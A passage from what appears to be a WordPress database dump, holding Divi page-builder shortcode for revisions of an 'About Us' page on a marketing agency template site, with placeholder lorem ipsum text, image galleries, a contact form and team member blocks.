animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-07 18:15:10','2020-08-07 18:15:10','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/392-revision-v1/',0,'revision','',0),(522,1,'2020-08-07 18:15:44','2020-08-07 18:15:44','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/business_01.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Building the future</h2>\r\n<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis iste natus sit voluptatem accusantium doloremque laudantium totam rem aperiam, eaque ipsa quae ab.</p>\r\n<p>Illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. <span style=\"font-size: 16px;\">Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem.</span></p>\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"110px|0px|110px|0px\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. Fusce ipsum enim, <strong>ultrices at ante sollicitudin</strong>, faucibus hendrenunc. Nullam tempor nulla eu imperdiet interdum.</span></p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||110px|\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"3.22\" custom_padding=\"110px||60px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Eduard Ungureanu\" position=\"Project Manager\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-01.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Christina Foster\" position=\"Creative Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-06.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Jason Wardak\" position=\"Visual Media\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" 